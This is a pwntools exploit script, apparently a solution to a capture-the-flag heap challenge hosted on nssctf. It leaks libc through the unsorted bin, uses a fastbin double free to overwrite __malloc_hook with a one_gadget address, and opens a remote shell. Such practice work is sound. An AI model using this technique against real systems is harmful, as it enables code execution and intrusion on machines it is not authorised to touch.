1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
| from pwn import *
io = remote("node5.anna.nssctf.cn", 22876)
elf = ELF("./vuln")
libc = ELF("./libc-2.31.so")
context(os='linux', arch='amd64')
def debug():
gdb.attach(io)
def malloc(idx, size, message):
io.sendlineafter(b'4. Exit\n', b'1')
io.sendlineafter(b'Index: ', str(idx).encode())
io.sendlineafter(b'Size: ', str(size).encode())
io.sendafter(b'Content: ', message)
def free(idx):
io.sendlineafter(b'4. Exit\n', b'2')
io.sendlineafter(b'Index: ', str(idx).encode())
def show(idx):
io.sendlineafter(b'4. Exit\n', b'3')
io.sendlineafter(b'Index: ', str(idx).encode())
one_gadget = 0xe3b01
for i in range(9):
malloc(i, 0x80, b'a')
for i in range(8):
free(i)
show(7)
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x70 - libc.sym["__malloc_hook"]
print(f'libc:{hex(libc_base)}')
for i in range(10):
malloc(i, 0x20, b'a')
for i in range(8):
free(i)
free(8)
free(9)
free(8)
for i in range(7):
malloc(i, 0x20, b'a')
malloc(7, 0x20, p64(libc_base + libc.sym["__malloc_hook"]))
malloc(8, 0x20, b'a')
malloc(9, 0x20, b'a')
malloc(10, 0x20, p64(libc_base + one_gadget))
io.sendlineafter(b'4. Exit\n', b'1')
io.sendlineafter(b'Index: ', b'1')
io.sendlineafter(b'Size: ', b'32')
io.interactive()
|